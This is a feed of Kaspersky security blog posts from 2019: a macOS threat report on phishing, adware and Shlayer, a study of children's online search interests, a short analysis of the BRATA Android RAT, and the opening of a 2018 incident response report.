Kaspersky

Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 39 perc 4 másodperc
2019. szeptember 11.

Threats to macOS users

Introduction

The belief that there are no threats for the macOS operating system (or at least no serious threats) has been bandied about for decades. The owners of MacBooks and iMacs are only rivaled by Linux users in terms of the level of confidence in their own security, and we must admit that they are right to a certain degree: compared to Windows-based systems, there are far fewer threats that target macOS. However, the main reason for this is the number of potential victims: there are many more computers running Windows than those running macOS. However, the situation is changing, since the popularity of the latter platform is growing. Due to this and despite all the efforts that have been taken by the company, the threat landscape for Apple devices is changing, and the amount of malicious and unwanted software is growing.

For the purposes of this report we used the statistics from Kaspersky Security Network cloud infrastructure. It stores information about all of the malicious programs and other threats that our macOS product users agreed to anonymously share with us. In fact, all these threats at some point attacked the computers of Kaspersky security solution users, but these attacks were successfully repelled.

Figures and trends Phishing
  • During the first half of 2019, we detected nearly 6 million phishing attacks on macOS users. Of these, 11.80% targeted corporate users.
  • The countries with the largest share of unique macOS users who experienced phishing attacks were Brazil (30.87%), India (22.08%), and France (22.02%).
  • The number of phishing attacks that make use of the Apple brand name grows by 30–40% every year. In 2018, the number of such attacks approached 1.5 million. As of June, the number of phishing attacks in 2019 has already exceeded 1.6 million, which is an increase of 9% over the entire previous year.
Malicious and potentially unwanted software
  • From 2012 to 2017, the number of macOS users who have experienced attacks from malicious and potentially unwanted programs grew, approaching 255,000 attacked users per year. However, starting in 2018, the number of attacked users began to decrease, and in the first half of 2019 it only amounted to 87,000.
  • The number of attacks on macOS users through malicious and potentially unwanted programs has been increasing annually since 2012, and in 2018 it exceeded 4 million attacks. During the first half of 2019, we registered 1.8 million attacks of this kind.
  • The vast majority of threats for macOS in 2019 were in the AdWare category. As for the malware threats, the Shlayer family, which masquerades as Adobe Flash Player or an update for it, has been the most prevalent.
  • More than a quarter of Mac users who are protected by Kaspersky solutions and have experience malicious and potentially unwanted software attacks live in the USA.
Phishing for Mac users

We started collecting detailed statistics on phishing threats that target macOS users in 2015. The data that has been collected over the last four years suggests that the number of phishing attacks on macOS users is definitely growing, and quite rapidly at that. While in 2015 we registered a total of 852,293 attacks, in 2016 this figure grew by 86% to over 1.5 million, and in 2017 it skyrocketed to 4 million. In 2018, the number of attacks continued to grow, crossing the 7.3 million mark. At this point we can see that during the first half of 2019 alone, 5,932,195 attacks were committed, which means that the number of attacks may exceed 16 million by the end of the year if the current trend continues.

Growth in the number of phishing attacks on macOS users, 2015–2019

The share of corporate macOS users who faced phishing attacks during the first half of 2019 came up to 11.80%. This is a slight increase compared to the same period in 2018, when this category made up 10.25%.

The phishing page subject matters

In order to understand what services phishing pages impersonate, we analyzed the most common phishing tricks and the geography of attacked users. Then we compared the results with the data from the same period of 2018.

Both in 2019 and 2018, the phishing pages visited by MacOS users most often pretended to be banking services (39.95% in 2019 and 29.68% in 2018), the second popular being global Internet portals (21.31% in 2019 and 27.04% in 2018). Social networks came in third in 2019 (12.3%), taking up the online stores’ place (10.75% in 2018).

H1 2018 H1 2019 Banks 29.68% Banks 39.95% Global Internet portals 27.04% Global Internet portals 21.31% Online stores 10.75% Social networks 12.30% Payment systems 6.63% Payment systems 8.40% Telecommunications companies 5.22% Online stores 8.24% Social networks 5.06% Web services 4.70% Financial services 4.87% Telecommunications companies 2.06% Web services 4.16% IT companies 0.49% Messengers 1.19% Online games 0.44% Online games 1.06% Financial services 0.35% Other 4.35% Other 1.76%

Phishing pages by share of users, first halves of 2018 and 2019

Geography

The countries with the largest share of unique macOS product users facing phishing attacks during the first half of 2019 were Brazil (30.87%), India (22.09%), and France (22.02%). In 2018, the top three countries were the same as in 2019. The only difference was in the percentages of users who were attacked: Kaspersky solutions prevented attacks against one out of four Mac product users in Brazil (26.02%), against one out of five in France (20.86%) and 17.70% in India.

H1 2018 H1 2019 Country % of attacked users Country % of attacked users Brazil 26.02% Brazil 30.87% France 20.86% India 22.09% India 17.70% France 22.02% Spain 17.40% Spain 22.01% Hong Kong 15.65% Australia 20.08% Australia 15.14% Mexico 19.89% Great Britain 14.43% Italy 18.36% Mexico 13.53% Great Britain 18.11% Canada 13.49% Canada 18.06% Italy 13.11% Russia 17.25%

Geography of phishing attacks by share of users, first halves of 2018 and 2019

Spam and phishing attacks that impersonate Apple

Among the phishing attacks faced by macOS users we would separately focus on fake web pages that mimic Apple’s official pages or simply mention the brand. Not so long ago, in 2016, there were relatively few attacks (755,000) that tried to take advantage of the brand. But in 2017 they had grown by almost 40% to exceed 1 million, and a year later they almost reached 1.5 million. We have every reason to believe that a new record will be set in 2019: during the first half of the year alone, our solutions prevented more than 1.6 million attacks, which means that by the end of the year we can expect at least twofold growth.

Number of phishing attacks using the Apple brand, 2016–2019

Let’s take a closer look at some examples of phishing pages that mimic the official Apple website. Naturally, most commonly these phishing attacks aim to steal users’ Apple IDs.

Examples of phishing pages that are designed to steal AppleIDs

Links to these sites are usually sent in emails that allegedly come from Apple Support. The recipient is threatened that their account will be locked unless they click the link and log in to confirm the information that has been specified in their profile.

Examples of phishing emails that have been sent to steal an AppleID

Another phishing trick is thank you messages for purchasing an Apple device or app on the App Store. The “client” is invited to learn more about the product (or cancel the purchase) by clicking a link that leads to a phishing page. Here, the victim is required to enter their Apple ID login and password, which, of course, will be sent to the attackers.

Fake malware attacks

Another variation on phishing web pages is malware infection detection notification pages. The design for these notifications varies. Some of them are very high quality, and they faithfully copy the design of the official Apple website. The threat of a malware infection is supposed to convince the user to call a fake support number or install a fake antivirus application that will turn a non-existent threat into a real one.

Example phishing page that provides a notification of a nonexistent infection

Malicious and unwanted programs for macOS

At the time of writing, our database contained 206,759 unique malicious and potentially unwanted files for macOS. The diagram below illustrates the growth of our database, i.e., the number of abovementioned files that were added to the database in a given year.

The number of malicious and potentially unwanted files for macOS, 2004–2019

As you can see from the diagram, up to 2011 the number of malicious files targeting macOS that were detected each year was insignificant. But then the situation changed: starting in 2012, the number of files we collected began to double year over year. However, during the first half of 2019, only 38,677 malicious and potentially unwanted objects were detected, which means that we do not expect to see a similar increase this year over 2018.

In order to identify the changes in the number of macOS users who were attacked by malware in recent years, we examined our statistics from 2012 (the time when data was first systematized) to the present. Much like in the diagram above, you can see a sharp increase in the number of users who were attacked between 2012 and 2017.

Number of unique macOS users attacked by malware, 2012 to June 2019

In order to roughly estimate how often macOS users are attacked by both malicious and unwanted software, we can look at the diagram that illustrates the number of times that Kaspersky products have detected either of the threats.

Number of times that Kaspersky products detected malware and potentially unwanted software for macOS, 2012 to June 2019

This diagram clearly shows an increase in the number of attacks that occurred in 2018. At the same time, the data for 2019 (1,820,578 attacks over the first 5 months) suggests that this year the number of attacks will decline.

Geography of attacks

In order to get an idea of the geographical distribution of threats for macOS and to determine if there are regions where users are more likely to be attacked by malicious software nowadays, we compiled a rating of countries by the share of unique users attacked in the first half of 2019, and, for the sake of comparison, in the first half of 2018.

H1 2018 H1 2019 # Country % of attacked users Country % of attacked users 1 USA 29.2% USA 24.4% 2 Germany 11.9% Germany 14.6% 3 France 8.3% France 12.4% 4 Great Britain 7.3% Great Britain 6.8% 5 Canada 4.7% Spain 5.1% 6 Russia 4.3% Japan 4.7% 7 Spain 3.8% Russia 4.6% 8 Italy 2.8% Canada 4.1% 9 Japan 2.7% Italy 4.0% 10 Brazil 2.5% Brazil 2.9%

* Kaspersky product for macOS users in the country out of all users of these products

The top three countries remained the same between 2018 and 2019: the United States came in first place (24.4%), Germany came in second (14.6%), and France came in third (12.4%).

2019 threats

Here are the TOP 10 threats for macOS that we have observed during the first half of 2019:

Verdict %* HEUR:Trojan-Downloader.OSX.Shlayer.a 21.74% not-a-virus:HEUR:AdWare.OSX.Bnodlero.q 16.34% not-a-virus:HEUR:AdWare.OSX.Spc.a 12.75% not-a-virus:HEUR:AdWare.OSX.Geonei.as 10.24% not-a-virus:AdWare.OSX.Geonei.ap 10.24% not-a-virus:HEUR:AdWare.OSX.Pirrit.j 7.78% not-a-virus:HEUR:AdWare.OSX.Pirrit.p 7.60% not-a-virus:AdWare.OSX.Agent.b 6.17% not-a-virus:HEUR:AdWare.OSX.Pirrit.o 6.00% not-a-virus:HEUR:AdWare.OSX.MacSearch.a 5.82%

* The share of unique users attacked by this malware out of all users of Kaspersky security solutions for macOS who have been attacked

With the exception of the Shlayer trojan that came in first place (more about that a little later), the rest of the top ten is filled out by various unwanted software belonging to the AdWare class. The objective of these programs, as you might guess from the name, is to display ads wherever possible: in system notifications, web page banners, search results pages, the browser, etc. This does not actively harm the user, but it definitely does not add a positive spin to using your computer.

Example of malware installed or advertised to users by some types of AdWare

Let us proceed from a general description to specific examples. The AdWare.OSX.Bnodlero family prefer to work with the browser: this software installs ad extensions, and changes the default search engine and homepage. In addition, it can download and install extra adware.

Some samples in the AdWare.OSX.Pirrit family go even further and install a proxy server on the victim’s machine to intercept traffic from the browser. There is another family that is closely connected with this one, Agent.b, since it is precisely this unwanted software that frequently downloads Pirrit. When it is not busy downloading, unpacking, and launching files, Agent.b injects JS code with advertising into the web pages that are viewed by the victim.

We would also like mention the AdWare.OSX.Cimpli family. At first glance it is no different from other adware. However, its samples behave more cunningly, and become purposely inactive if they detect an installed security solution in macOS.

When they detect these types of applications, AdWare.OSX.Cimpli family samples prefer to stay inactive

We assume that this feature was added to Cimpli in order to protect it from being listed in the databases of security software developers and, as a result, from being blocked. However, if there is a chance that the user will delete the program, then the malware will wake up and start working.

The Trojan-Downloader.OSX.Shlayer family, which heads our top ten ranking, downloads and installs various AdWare, mainly from the Bnodlero family (and this is one of the reasons why Bnodlero ranks second).

Why do we detect this particular family so often? It all has to do with how widely it is distributed: if you try to search for sites where you can watch or download a popular movie or TV series for free, the very first search results will lead to resources that request you to update Flash Player in order to view content. It is these updates that contain Shlayer.

Link to a site with Shlayer on the first search results page

Note that this technique of pushing a link to a malicious page up in the search results for certain queries is also used by distributors of other malware. Not so long ago, we studied the threats that target Game of Thrones and other popular TV series fans who wanted to download new and not yet released episodes or watch them online.

One of the websites encouraging users to download malware under the pretext of updating Flash Player

It is worth noting that from the technical point of view, Shlayer is nothing special. Its main executable file is a Bash script that consists of only four lines of code. All that it does is decrypt and run another file that it brings along with it, which in turn downloads, decrypts, and executes another file, which does exactly the same. In the end, this nesting doll of various malware installs several AdWare programs, hides them well and registers them to run at startup.

The main executable file of the Shlayer Trojan is just the outer layer of a nesting doll

Two other malware families that we encountered during the first half of the year are Trojan.OSX.Spynion and Trojan-Downloader.OSX.Vidsler. Both are far from being as popular as Shlayer, as they have been encountered by less than one percent of our users. However, each of them utilizes its own method of deceiving a potential victim, and both deserve attention.

The Trojan.OSX.Spynion trojan is distributed along with several free macOS apps, mainly from sites such as MacUpdate, VersionTracker, and Softpedia. While the app is being installed on the victim’s computer, a malicious component is downloaded and installed. The Spynion’s main objective is to monitor user activity on the network and transfer intercepted confidential data to the attackers’ servers. The trojan also has backdoor functionality, i.e., it allows attackers to remotely connect to the user’s macOS.

Trojan-Downloader.OSX.Vidsler is distributed via banner ad links, only this time under the pretext of requiring the user to update video codecs or download a new version of a video player. In terms of functionality, Vidsler is similar to Shlayer: it downloads, installs, and runs other software, most often from the FkCodec AdWare family.

Lastly, we should point out several rather dangerous trojans, which, fortunately, are not encountered very frequently in the wild. For example, the Trojan-Ransom.OSX.KeRanger family ransomware trojans encrypt all of the user’s files on the drive and demand a ransom to decrypt them. This malware is known to have been distributed through the official website of the Transmission torrent client. Another example is the Trojan-Spy.OSX.Ventir trojan, which has a complex modular architecture and contains not only a backdoor to remotely access the victim’s macOS, but also a keylogger.

MacOS and targeted attacks

Our statistics concerning threats for macOS provide fairly convincing evidence that the stories about this operating system’s complete safety are nothing more than that. However, the biggest argument against the idea that macOS (and iOS as well) is invulnerable to attack is the fact that there already have been attacks against individual users of these operating systems and groups of such users. Over the past few years, we have seen at least eight campaigns whose organizers acted on the presumption that the users of MacBook, iPhone, and other devices do not expect to encounter malware created specifically for Apple platforms.

Due to the nature of Apple’s antivirus software policy, the Kaspersky product line does not contain a security solution for iOS. Due to that we do not have statistics about threats for this operating system. However, along with malware for Android, Kaspersky researchers have also encountered malicious implants for iOS.

Next, we will provide an overview of what we consider to be the most interesting targeted attacks against the macOS and iOS platforms that we have been investigating over 2018 and 2019.

The Skygofree implant for iOS (January 2018)

Soon after the discovery of the Skygofree Android implant, Kaspersky experts found and analyzed an implant for iOS that had been developed by the same group of cybercriminals. It was discovered as a result of the analysis of the Skygofree infrastructure and consisted of several configuration files (MobileConfig) for iOS, which were used to register the device on an MDM server.

Sofacy XAgent (March 2018)

Kaspersky experts closely follow the activity of Sofacy, one of the most professional of cyber espionage groups. One of the tools at the disposal of this group is XAgent, which is a set of malware sharing a common code base, each sample individually modified to infect a specific OS, including macOS and iOS. However, the most recent detected versions of this malware for iOS date back to the end of 2014 and the beginning of 2015. This may mean that cybercriminals have (at least temporarily) lost interest in iPhones and iPads.

Bahamut-related implants for iOS and Windows (July 2018)

While studying the Skygofree iOS implant, our experts attempted to find other malware campaigns that used the results of a study of Apple’s MDM system conducted by the Intrepidus Group to compromise iOS devices. As a consequence, several servers have been discovered that presumably belong to the Bahamut group and have been active since 2017.

Operation AppleJeus (August 2018)

While investigating an attack on a cryptocurrency exchange service conducted by the Lazarus group, we discovered that the attackers sent out messages to potential victims with a link to a malicious macOS cryptocurrency trading app.

ThreatNeedle and Manuscrypt (October 2018)

In 2018, we also discovered that Manuscrypt, a piece of malware used exclusively by the Lazarus group, was engaged in suspicious activity. The new samples of this malware were noticeably different from those exposed during previous campaigns, so we gave them a new name: ThreatNeedle.

Windtail (December 2018)

Shortly after Dark Matter published its findings about the Windshift group in August 2018, we conducted our own investigation on the activities of this group. In particular, we were interested in a piece of macOS malware called Windtail.

New macOS malware from Lazarus (January 2019)

Six months after the AppleJeus operation, we discovered new Lazarus activity campaign that manifested similar symptoms: again, companies from the financial sector were hit, and again previously unknown malware for macOS was used during the attack.

New iOS implant version from FinSpy (mid 2019)

At the end of 2018, we discovered a new version of the FinSpy iOS implant in the wild, which was apparently developed during the summer of that year. This implant was part of the FinSpy Mobile product that was provided by the well-known tracking software developer.

Conclusion

MacOS malware has come a long way from isolated instances that existed in 2004 to hundreds of thousands of types that now exist in 2019. However, the era of explosive growth seems to be behind us, and we cannot but notice the decline in the activity of cybercriminals on this platform. However, the owners of MacBooks and iMacs have never been considered priority targets compared to Windows users, as the latter have always been much more profitable to attack simply because they were far more numerous. In addition, there is a large number of both known and not very well known exploits for Windows, which, when combined with the fact that Windows users tend to install updates irregularly, make it easier and more convenient for cybercriminals to infect Windows systems.

Another important aspect that we have discovered while preparing this report is that instead of full-fledged malware, MacBook and iMac owners increasingly receive annoying, but in most cases relatively harmless ads. It seems that this way of monetizing an infection allows attackers to make a profit and save on expenses. By contrast, it would be much more complicated and expensive to create full-fledged malware for macOS. The reasons for this are both the fact that there are fewer potential victims and the efforts that Apple is making to protect its customers.

Phishing and social engineering, which are now also on the rise, are another example of cheaper threats. The attackers continue to mainly target Apple IDs, which are the users’ key to gaining access to Apple’s infrastructure. Apple IDs are relatively easy to monetize. For example, they can be sold to other criminals. Perhaps the theft of this type of data is now the most dangerous threat macOS users face, in terms of the balance between the probability of the attack and the damage in the event of its success. Moreover, our statistics show that this type of attack is likely to be on the rise in the near future.

An extremely dangerous (but also an extremely rare) threat is a targeted attack on macOS and iOS users, mainly business users. Several well-known cybercriminal groups are currently working to develop malware for these operating systems, but the likelihood that a random user will be the target of such programs is extremely small. However, if you work in a financial institution, such as, for example, a bank, and your MacBook or iPhone is a corporate device, then the chances that you will be targeted increase considerably. In this case the threat is significant enough, so we do not recommend relying on the fact that Apple devices are in general less popular targets, and we recommend seeking out a reliable security solution. More so as we expect the number of targeted attacks on macOS and iOS devices to increase between 2019 and 2020.

To keep your devices on MacOS safe, Kaspersky recommends
  • Try to keep macOS and all of your apps up to date
  • Use only legitimate software, downloaded from official webpages or installed from Mac App Store
  • Start using a reliable security solution like Kaspersky Internet Security that delivers advanced protection on Mac, as well as on PC and mobile devices
  • Download and install apps only from the official resources such as Appstore.
  • If you need to access your iCloud, for instance to find your phone when it is lost, use only official website.
To reduce the risk for corporate MacOS users, Kaspersky recommends companies to take the following measures
  • Implement security awareness training for staff explaining how to recognize and avoid potentially malicious applications or files. For example, employees should not download and launch any apps or programs from untrusted or unknown sources.
  • Use a dedicated security products with protection for MacOS and iOS included, such as Kaspersky Endpoint Security for Business. The product empowered with cloud-based threat intelligence and machine learning technics to detect existed and new threats for different operating systems.
  • Provide your SOC team with access to the latest Threat Intelligence, which cover threats for MacOS, to keep up to date with the new and emerging tools, techniques and tactics used by threat actors.
2019. szeptember 9.

This is what our summer’s like

For the second summer straight, we cover the children’s interests during the period when they have enough leisure to give themselves full time to their hobbies. Modern children are active users of the internet, so most of their interests find reflection in their online activities, which are the subject of our today’s review.

Statistics collection principles

Kaspersky Lab products scan the content of web pages children try to access. If the website belongs to one of the fourteen unwelcome categories, the Kaspersky Security Network is alerted (no private user data is sent, so privacy is not compromised). Mark these two important points:

It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. But anonymous statistics are collected for all the 14 categories.

Data is harvested only from computers running Windows and macOS; no mobile statistics are provided in this report.

Website categorization

In the products featuring Parental Control functions web filtering is currently performed across the following categories:

Search query filtering

Children’s search activities best illustrate their interests. Kaspersky Safe Kids is able to filter kids’ queries for five different search engines: Bing, Google, Mail.ru, Yahoo! and Yandex — across six potentially risky subjects: “Adult content”, “Alcohol”, “Drugs”, “Tobacco”, “Racism” and “Profanity”.

We have grouped search queries by language. The English statistics we consider to be international, because English is such a wide spread language. We assume 100% to be the total of search queries submitted by individual users in all languages across all subjects of our interest, repetitions included. The percentage of queries says how popular a subject is.

We have split the search queries we collected from June through August 2019 into several subject categories:

  • Anonymity online
  • Alcohol, tobacco, narcotics
  • News
  • Anime
  • Memes
  • Sports
  • Celebrities
  • Education
  • Music
  • Online communication
  • Translator
  • Porn and erotic
  • Shopping
  • Computer games
  • Video
Picture of the world

This summer, children didn’t change their habits much: just like one year ago they would spend time watching YouTube videos, TV series and movies, listening to music and chatting on social networks. Much of their time was dedicated to online store browsing.

News websites drew less attention than last summer, losing 4.63 percentage points down to 6.84%. The share of porn websites somewhat decreased (by 1.21 p.p.) as well: this summer these accounted for mere 1.06% of all visited resources. Alcohol, tobacco and drugs websites have left modern children’s sphere of interests almost completely — their statistic is 0.36%.

Interestingly, the “Computer games” category has lost ground, too: from 5.33% to 1.98%. This does not mean that children have stopped to play games — quite the opposite. As explained in our annual report, children have quickly developed passion for mobile games and migrated to mobile platforms almost completely.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Parental Control module and Safe Kids product notifications across 14 categories, June — August 2019 (download)

If you look at how popular different search query subjects are, you will see that most of the time children would be looking for movies and TV series (21.93% of all queries analyzed), computer games info (18.97%), merchandise (12.91%), porn and erotic content (10.50%).

It is important to emphasize that search queries reflect exactly children’s interests, while website visits speak of how they spend time online. Thus, if we look at, say, the “Online communication” category, we shall see that it accounts for 30.41% of visits, but merely 7.20% of search queries. This is because Facebook gets listed among search queries by mistake: if you begin typing “face…” into the address bar, the browser will suggest the full URL (facebook.com), but if you ignore the suggested option, the text you type will turn into a query for the search engine.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

User search queries by subject category, June — August 2019 (download)

Software, audio, video

We have observed more than once that children take interest in video and audio content and, more than anything else, like to visit YouTube and other streaming platforms to view gaming streams or listen to music.

YouTube vs movies vs animations

YouTube is one of top choices for children. They use it to watch game walkthroughs, musical clips, lifestyle video blogs and lots of other things.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

User search queries in the “Video” category, June — August 2019 (download)

YouTube accounts for most video-related queries. Children are looking both for the service itself (“youtube” being the most popular search query, representing the same search pattern as “facebook”) and all sorts of bloggers.

This summer, other than the famous blogger PewDiePie, many kids were looking for the English-speaking beauty blogger James Charles (16,040,666 subscribers at the time of writing).

Coming up third is the professional Battle Royale (popular game genre among children) player and streamer Ninja.

Speaking of movies, children’s top-ranking queries were about Spider-Man: Far From Home, Disney’s version of Aladdin and John Wick: Chapter 3 starring the extremely popular and meme-sparking

(since 2010) Keanu Reeves.

As to TV series, children’s favorite this summer is Stranger Things, its third season released early July. They would be looking not just for the series itself, but also for info about the actors, who are of the same age as many of our young users.

The second most popular one, based on search queries, is HBO’s Chernobyl miniseries. Interestingly, with the series so popular, children have begun to dig more into radiation and all things related. We have registered queries like “radioactive”, “radon”, “radiation”, which would never have made it even into TOP 10,000 before.

Music

This summer’s most popular streaming service — and also the top search query among kids — is Spotify. Billie Eilish, whom we have already covered in our annual report, is second in terms of search query frequency. In third place is this summer’s hit Old Town Road by Lil Nas X. The track has seen lots of remixes, has 284,202,308 views on YouTube, and is used in over 2 million videos uploaded to TikTok.

Computer games

This 2nd of August, a press release came out claiming that the number of Roblox players (active users) has exceeded 100 million, surpassing the number of Minecraft players (91 million). Interestingly, according to statistics there are more queries about Minecraft. Moreover, Fortnite turned out more popular than Roblox according to the same criterion, too. But this should not lead to conclusions about the time children spend on a particular game. Search activity may be related to attempts to clarify some gameplay processes or simply find walkthroughs.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

(download)

Speaking of the big game industry events that got children involved this summer, we should mention Keanu Reeves’ appearance at the year’s main gaming exhibition, E3: the actor showed on stage during announcement of one of next year’s most awaited games — Cyberpunk 2077, and, as became clear from the game’s new trailer, was cast as one of the game’s NPCs. By the way, Reeves has made one of children’s top search queries among celebs this summer.

Online stores and shopping

In our annual report, we mentioned children’s heightened interest in online shopping. According to search queries, kids get more time for online stores in the summer. Thus, the “Shopping” category’s annual percentage of 8.72% has reached 12.91% over the summer. As before, amazon, ebay and aliexpress were the most popular queries. The clothes brands children were looking for the most were Vans, Gucci, Zara, H&M, as well as today’s extremely popular Off-White and Balenciaga. Speaking of electronics, the top searches were Apple and Samsung.

Online communication

The short videos format is today’s global trend in social networking, and the TikTok network (which we covered extensively in our annual report) is fully aligned with it. The network has remained popular during the summer, even overtaking SnapChat in terms of the number of subject-related search queries.

And yet Facebook is still the most popular search query for online communications. Followed by Instagram and Twitter, with TikTok, Pinterest and SnapChat bringing up the rear.

Porn and erotic

If we are to compare our annual and summer statistics, it is clear that children become less interested in pornographic content during summer vacation: 14.90% of search queries for the whole year vs 10.50% for summer. Regarding visits to porn websites from the PC, the annual figure is 2.08%, vs 1.06% in summer.

Search queries suffered basically no change over these periods. This summer, children, as before, would be searching for “porn”, “hentai”, and the porn star Mia Khalifa, who, apart from her core activity, is quite a popular blogger with almost 17 million Instagram followers.

Anime, memes, VPN and much more

Other that the global interests, we have identified a few more noteworthy subjects to be covered in this article.

Children like watching anime and, according to search queries, they do it on the website called Сrunchyroll — one of the most popular queries for “Anime”.

Speaking of the meme world, children did not fail to heed the goings on around the American Storm Area 51 event — subject of active discussions online this summer. There were also many queries concerning Grumpy Cat, who died this May, thus sparking much interest.

This summer, we also noticed children paying somewhat more attention to online privacy and anonymity. Queries about VPN, Proxy and Tor browser have made it to the top of the list. On the whole, according to our data, children’s interest for the subject is on the rise of late.

Summary

Children are well informed about what is going on in the world. Many of this summer’s big internet events got their attention. Moreover, many things are happening exactly thanks to children. Thus, the 100 million Roblox users are mostly kids. In the early days of TikTok, most of the network’s users were children and teenagers — the trend was taken up by adults only later.

Kaspersky Lab’s Safe Kids product allows parents to follow the child’s interests and stay informed about the child’s search and browsing history. We recommend using this tool as your assistant in building a relationship of trust with your child, not yet another internet filter.

2019. augusztus 29.

Fully equipped Spying Android RAT from Brazil: BRATA

“BRATA” is a new Android remote access tool malware family. We used this code name based on its description – “Brazilian RAT Android”. It exclusively targets victims in Brazil: however, theoretically it could also be used to attack any other Android user if the cybercriminals behind it want to. It has been widespread since January 2019, primarily hosted in the Google Play store, but also found in alternative unofficial Android app stores. For the malware to function correctly, it requires at least Android Lollipop 5.0 version.

The cybercriminals behind BRATA use few infection vectors. For example, they use push notifications on compromised websites; and also spread it using messages delivered via WhatsApp or SMS, and sponsored links in Google searches.

The first samples we found in the wild date to January and February 2019, while so far over 20 different variants have appeared in the Google Play Store, the majority of these pose as an update to the popular instant messaging application WhatsApp. The CVE-2019-3568 WhatsApp patch is one of the topics abused by BRATA threat actor. Once a victim’s device is infected, “BRATA” enables its keylogging feature, enhancing it with real-time streaming functionality. It uses Android’s Accessibility Service feature to interact with other applications installed on the user’s device.

COMMAND DESCRIPTION Start/Stop Streaming Capture and send user’s screen output in real-time. Turn Off/Fake Turn Off Can be used to turn off the screen or give the user the impression that the screen is off while performing actions in the background. Device Information Retrieves Android system information, logged user and their registered Google accounts, but missing permissions to properly execute the malware, and hardware information. Request Unlock/Unlock Device Request the user to unlock the device or perform a remote unlock. Start Activity Launch any application installed with a set of parameters sent via a JSON data file. Send Text Send a string of text to input data in textboxes. Launch/Uninstall Launch any particular application or uninstall the malware and remove traces of infection.

It is worth mentioning that the infamous fake WhatsApp update registered over 10,000 downloads in the official Google Play Store, reaching up to 500 victims per day.

Kaspersky products detect this family as “HEUR:Backdoor.AndroidOS.Brata”

In general, we always recommend carefully review permissions any app is requesting on the device. It is also essential to install an excellent up-to-date anti-malware solution with real-time protection enabled.

Reference md5 hashes:

  • 1d8cf2c9c12bf82bf3618becfec34ff7
  • 4203e31024d009c55cb8b1d7a4e28064
  • 4b99fb9de0e31004525f99c8a8ea6e46

To get a complete list of IoCs along with YARA rules, please visit Kaspersky Threat Intelligence Portal https://tip.kaspersky.com/

2019. augusztus 29.

Incident Response report 2018

 Download full report (PDF)

Introduction

This report covers our team’s incident response practices for the year 2018. We have thoroughly analyzed all the service requests, customer conversations and incident response deliverables to provide you an overview in numbers. The report includes statistics on how companies reveal data breaches and compromises, the attack vectors most commonly used by adversaries, how long they remain inside a company’s infrastructure and much more. We also provide some high-level recommendations to improve resilience against such attacks.

The data used in this report comes from the wide range of incident investigation services provided by Kaspersky teams. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. However, our operational coverage is much greater and that’s why our company focused many more resources on incident response and malware analysis activities. An example of this is the advanced targeted attack investigations by the Global Research and Analysis Team (GReAT).

Reasons for requesting incident response

More than half of the requests for investigation were initiated by customers after detecting an attack that had visible consequences, such as unauthorized money transfers, workstations encrypted by ransomware, service unavailability, etc. This indicates the need to improve attack detection methods and incident response procedures within a company to avoid financial losses and to minimize the impact of attacks on the company’s infrastructure.

It should be noted that in two out of three cases, investigation of incidents related to the detection of suspicious files or network activity revealed an actual attack on the customer’s infrastructure. In the other cases, suspicious activity was caused by unusual user actions or software behavior related to security misconfigurations.

The most common reason for customer requests was a ransomware attack. This category of attack is characterized by rapid development, difficulty of early detection, and contrastingly obvious consequences.

Experts from Kaspersky Anti-Malware Research Department ranked the most common types of ransomware which targeted organizations in 2018.

If a ransomware attack is detected, it is recommended to:

  • Isolate the host and the network segment where the incident took place to avoid further attack development.
  • Take snapshots of RAM and images of the hard drives for further detailed investigation.
  • Analyze encrypted files to determine the malware type. This will help to promptly implement a set of initial response measures.
  • Conduct an investigation of the incident to determine the initial vector of attack and find possible backdoors to prevent recurrence of the incident.
Name Share of victims WannaCry 40.64% Cryakl 7.37% GandCrab 5.15% (generic verdict) 3.63% Purgen/ GlobeImposter 2.74% Crysis/Dharma 2.67% Shade 2.41%

Top 7 ransomware attacks by share of victims

There are many more incidents in the wild

Only 22% of companies where evidence of malicious activity was detected requested an Incident Response service.

Kaspersky customers often request detailed analysis of the data collected by automated monitoring tools. As a result of analyzing this data, the following conclusions were reached:

81% of organizations that provided data for analysis were found to have indicators of malicious activity in their internal network.

One out of three organizations exhibited signs of an advanced targeted attack.

Attack trends and key security threats were identified for the following major sectors:

Financial Institutions Government Bodies Industrial Companies Signs of APT attacks appeared in the infrastructure of financial institutions one and a half times more often (54%) than in other organizations. Malicious activity was detected in 95% of government bodies which is 14% more than across all organizations in general. Industrial companies are more likely to be victims of bankers. Banker Trojan activity was detected in 27% of companies. A small share of financial organizations showed signs of ransomware (12%) or banker (8%) infections. Attempts to access resources associated with APT attacks were recorded in 45% of government bodies. Manufacturing companies are less prone to APT attacks (15%) and ransomware attacks (25%).

Adversary attack vectors

